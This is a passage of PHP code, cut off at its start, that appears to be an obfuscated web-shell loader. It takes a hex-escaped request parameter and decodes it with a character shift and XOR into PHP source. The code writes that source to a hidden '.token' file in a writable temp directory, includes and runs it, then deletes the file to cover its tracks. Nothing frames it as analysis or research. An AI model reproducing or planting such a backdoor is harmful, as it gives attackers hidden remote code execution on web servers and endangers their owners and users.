array_filter([ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", "/var/tmp", "/tmp", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), session_save_path()]); $component = $_REQUEST["\x62\x69nd"]; $component = explode ( '.' ,$component) ; $entry = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $j = 0; while( $j <count( $component)) { $v5 = $component[$j]; $chS = ord( $s[$j % $sLen] ); $dec =( ( int)$v5 - $chS -( $j % 10)) ^ 40; $entry.= chr( $dec ); $j++; } foreach ($value as $dat) { if ((function($d) { return is_dir($d) && is_writable($d); })($dat)) { $object = str_replace("{var_dir}", $dat, "{var_dir}/.token"); $success = file_put_contents($object, $entry); if ($success) { include $object; @unlink($object); exit;} } } }